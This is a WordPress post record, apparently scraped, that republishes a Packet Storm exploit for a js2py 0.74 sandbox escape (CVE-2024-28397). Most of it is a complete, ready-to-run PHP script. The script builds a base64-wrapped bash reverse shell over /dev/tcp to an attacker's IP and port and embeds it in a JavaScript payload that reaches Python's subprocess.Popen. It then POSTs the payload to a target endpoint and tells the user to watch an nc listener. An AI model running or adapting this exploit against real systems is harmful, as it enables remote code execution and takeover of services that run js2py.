{"id":31876,"date":"2025-12-18T10:44:55","date_gmt":"2025-12-18T10:44:55","guid":{"rendered":"http:\/\/localhost\/?p=31876"},"modified":"2025-12-18T10:44:55","modified_gmt":"2025-12-18T10:44:55","slug":"js2py-074-automated-sandbox-escape-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31876","title":{"rendered":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971"},"content":{"rendered":"

{“lastseen”:”2025-12-18T15:56:42″,”description”:”js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212971″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28397″],”sourceData”:”=============================================================================================================================================\\n | # Title : js2py v0.74 Automated Sandbox Escape \\u0026 Reverse Shell |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/pypi.org\/project\/Js2Py\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212543\/ \\u0026 CVE-2024-28397\\n \\n [+] Summary : js2py \u2014 a Python package that interprets and executes JavaScript code inside Python.\\n \\n [+] Nature of the Vulnerability\\n \\n The flaw exists in the sandboxing mechanism.\\n \\n The function disable_pyimport() fails to block access to Python internals.\\n \\n An attacker can escape the JavaScript sandbox and obtain Python object references.\\n \\n This leads to arbitrary Python code execution (RCE).\\n \\n [+] Impact\\n \\n Sandbox Escape\\n \\n Remote Code Execution (RCE)\\n \\n Threat level depends on context; potentially critical for web services using js2py to execute untrusted JS.\\n \\n [+] Affected Versions\\n \\n All versions up to and including v0.74\\n \\n There is no stable upstream patch on PyPI as of the time of vulnerability reporting.\\n \\n Some Linux distributions patched the package themselves.\\n \\n POC : php poc.php\\n \\n \\u003c?php\\n \/\/ Configuration for Terminal Colors\\n class Colors {\\n const HEADER = \\”\\\\033[95m\\”;\\n const BLUE = \\”\\\\033[94m\\”;\\n const GREEN = \\”\\\\033[92m\\”;\\n const WARNING = \\”\\\\033[93m\\”;\\n const FAIL = \\”\\\\033[91m\\”;\\n const ENDC = \\”\\\\033[0m\\”;\\n const BOLD = \\”\\\\033[1m\\”;\\n }\\n \\n function banner() {\\n echo Colors::BLUE . Colors::BOLD . \\”\\n \\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\n \\” . Colors::ENDC . \\”\\\\n\\”;\\n \\n echo Colors::HEADER . \\”[*] Automated Sandbox Escape \\u0026 Reverse Shell Generator\\” . Colors::ENDC . \\”\\\\n\\”;\\n echo Colors::HEADER . \\”[*] Target: js2py Library\\” . Colors::ENDC . \\”\\\\n\\”;\\n echo Colors::HEADER . \\”[*] Author: indoushka\\” . Colors::ENDC . \\”\\\\n\\”;\\n echo \\”—————————————————————\\\\n\\”;\\n }\\n \\n function generate_payload($attacker_ip, $attacker_port) {\\n \/**\\n * Generates the Malicious JavaScript payload to bypass js2py sandbox.\\n * \\n * @param string $attacker_ip The IP address of the listener (LHOST).\\n * @param int $attacker_port The port of the listener (LPORT).\\n * \\n * @return string The raw JavaScript payload.\\n *\/\\n echo Colors::BLUE . \\”[INFO]\\” . Colors::ENDC . \\” Generating Base64 encoded payload for {$attacker_ip}:{$attacker_port}…\\\\n\\”;\\n \\n \/\/ 1. Construct the Bash Reverse Shell\\n $raw_command = \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$attacker_ip}\/{$attacker_port} 0\\u003e\\u00261\\”;\\n \\n \/\/ 2. Base64 Encode to avoid syntax errors in JS\\n $b64_command = base64_encode($raw_command);\\n \\n \/\/ 3. Create the Execution Wrapper\\n $exec_command = \\”echo {$b64_command} | base64 -d | bash\\”;\\n \\n \/\/ 4. The JavaScript Sandbox Escape Logic (Credit: Marven11)\\n $js_payload = \\u003c\\u003c\\u003cJS\\n let cmd = \\”{$exec_command}\\”;\\n let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;\\n let obj = a(a(a,\\”__class__\\”), \\”__base__\\”);\\n \\n function findpopen(o) {\\n let result;\\n for(let i in o.__subclasses__()) {\\n let item = o.__subclasses__()[i];\\n if(item.__module__ == \\”subprocess\\” \\u0026\\u0026 item.__name__ == \\”Popen\\”) {\\n return item;\\n }\\n if(item.__name__ != \\”type\\” \\u0026\\u0026 (result = findpopen(item))) {\\n return result;\\n }\\n }\\n }\\n \\n let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();\\n console.log(result);\\n result;\\n JS;\\n \\n return $js_payload;\\n }\\n \\n function send_exploit($url, $js_payload) {\\n \/**\\n * Sends the crafted payload to the vulnerable endpoint.\\n *\/\\n $headers = [\\n \\”Content-Type: application\/json\\”,\\n \\”User-Agent: Mozilla\/5.0 (Security-Research-PoC)\\”\\n ];\\n \\n $data = json_encode([\\”code\\” =\\u003e $js_payload]);\\n \\n echo Colors::BLUE . \\”[INFO]\\” . Colors::ENDC . \\” Targeting URL: \\” . Colors::BOLD . $url . Colors::ENDC . \\”\\\\n\\”;\\n echo Colors::WARNING . \\”[WARN]\\” . Colors::ENDC . \\” Sending malicious payload. Check your listener! (nc -lvnp \\u003cport\\u003e)\\\\n\\”;\\n \\n try {\\n $ch = curl_init();\\n \\n curl_setopt($ch, CURLOPT_URL, $url);\\n curl_setopt($ch, CURLOPT_POST, 1);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_TIMEOUT, 5); \/\/ Timeout 5 seconds\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n \\n curl_close($ch);\\n \\n if ($error \\u0026\\u0026 strpos($error, ‘timeout’) !== false) {\\n echo \\”\\\\n\\” . Colors::GREEN . \\”[SUCCESS]\\” . Colors::ENDC . \\” Request timed out.\\\\n\\”;\\n echo Colors::GREEN . \\”[+]\\” . Colors::ENDC . \\” This usually indicates the shell has executed and is holding the connection.\\\\n\\”;\\n } else {\\n echo Colors::GREEN . \\”[+]\\” . Colors::ENDC . \\” Response Code: {$http_code}\\\\n\\”;\\n if (!empty($response)) {\\n echo Colors::GREEN . \\”[+]\\” . Colors::ENDC . \\” Response Body: {$response}\\\\n\\”;\\n }\\n }\\n \\n } catch (Exception $e) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” An error occurred: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n function check_dependencies() {\\n \/**\\n * Check if required extensions are loaded\\n *\/\\n if (!function_exists(‘curl_init’)) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” cURL extension is not enabled. Please enable it in php.ini\\\\n\\”;\\n exit(1);\\n }\\n \\n if (!function_exists(‘json_encode’)) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” JSON extension is not enabled. Please enable it in php.ini\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n function main($argv) {\\n banner();\\n check_dependencies();\\n \\n \/\/ Parse command line arguments\\n $options = [];\\n \\n \/\/ Simple argument parsing for Windows\\n for ($i = 1; $i \\u003c count($argv); $i++) {\\n if ($argv[$i] == ‘-u’ || $argv[$i] == ‘–url’) {\\n $options[‘url’] = $argv[++$i] ?? ”;\\n } elseif ($argv[$i] == ‘-i’ || $argv[$i] == ‘–ip’) {\\n $options[‘ip’] = $argv[++$i] ?? ”;\\n } elseif ($argv[$i] == ‘-p’ || $argv[$i] == ‘–port’) {\\n $options[‘port’] = $argv[++$i] ?? ”;\\n } elseif ($argv[$i] == ‘-h’ || $argv[$i] == ‘–help’) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” -u \\u003curl\\u003e -i \\u003cip\\u003e -p \\u003cport\\u003e\\\\n\\”;\\n echo \\”Example: php \\” . basename(__FILE__) . \\” -u http:\/\/target.com\/run_code -i 192.168.1.100 -p 4444\\\\n\\”;\\n exit(0);\\n }\\n }\\n \\n \/\/ Validate required arguments\\n if (empty($options) || !isset($options[‘url’]) || !isset($options[‘ip’]) || !isset($options[‘port’])) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” Missing required arguments!\\\\n\\”;\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” -u \\u003curl\\u003e -i \\u003cip\\u003e -p \\u003cport\\u003e\\\\n\\”;\\n echo \\”Example: php \\” . basename(__FILE__) . \\” -u http:\/\/target.com\/run_code -i 192.168.1.100 -p 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $url = $options[‘url’];\\n $ip = $options[‘ip’];\\n $port = intval($options[‘port’]);\\n \\n \/\/ Validate port number\\n if ($port \\u003c 1 || $port \\u003e 65535) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” Invalid port number: {$port}\\\\n\\”;\\n exit(1);\\n }\\n \\n \/\/ Validate URL format\\n if (!filter_var($url, FILTER_VALIDATE_URL)) {\\n echo Colors::FAIL . \\”[ERROR]\\” . Colors::ENDC . \\” Invalid URL format: {$url}\\\\n\\”;\\n exit(1);\\n }\\n \\n try {\\n $payload = generate_payload($ip, $port);\\n \\n \/\/ Show a preview of the payload\\n echo Colors::BLUE . \\”[INFO]\\” . Colors::ENDC . \\” Payload preview (first 200 chars):\\\\n\\”;\\n echo substr($payload, 0, 200) . \\”…\\\\n\\\\n\\”;\\n \\n \/\/ Ask for confirmation\\n echo Colors::WARNING . \\”[WARNING]\\” . Colors::ENDC . \\” This will send an exploit payload. Are you sure? (y\/n): \\”;\\n $handle = fopen(\\”php:\/\/stdin\\”, \\”r\\”);\\n $line = fgets($handle);\\n fclose($handle);\\n \\n if (trim(strtolower($line)) != ‘y’) {\\n echo Colors::FAIL . \\”[!]\\” . Colors::ENDC . \\” Operation cancelled by user.\\\\n\\”;\\n exit(0);\\n }\\n \\n send_exploit($url, $payload);\\n \\n } catch (Exception $e) {\\n echo Colors::FAIL . \\”[!]\\” . Colors::ENDC . \\” Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n \/\/ Run the main function with command line arguments\\n main($argv);\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212971″,”cvss”:{“score”:5.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212971\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-18T15:56:42″,”description”:”js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212971″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28397″],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,22,12,21,13,53,7,11,5],"class_list":["post-31876","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-53","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31876\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-18T15:56:42″,”description”:”js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212971″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28397″],”sourceData”:”=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31876\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-18T10:44:55+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \\\/ Code Execution_PACKETSTORM:212971\",\"datePublished\":\"2025-12-18T10:44:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876\"},\"wordCount\":1405,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.3\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31876#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876\",\"name\":\"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \\\/ Code Execution_PACKETSTORM:212971 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-18T10:44:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31876\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31876#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \\\/ Code Execution_PACKETSTORM:212971\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31876","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971 - zero redgem","og_description":"{“lastseen”:”2025-12-18T15:56:42″,”description”:”js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212971″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28397″],”sourceData”:”=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=31876","og_site_name":"zero redgem","article_published_time":"2025-12-18T10:44:55+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31876#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31876"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971","datePublished":"2025-12-18T10:44:55+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31876"},"wordCount":1405,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.3","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31876#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31876","url":"https:\/\/zero.redgem.net\/?p=31876","name":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-18T10:44:55+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31876#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31876"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31876#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 js2py 0.74 Automated Sandbox Escape \/ Code Execution_PACKETSTORM:212971"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31876"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31876\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31876"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}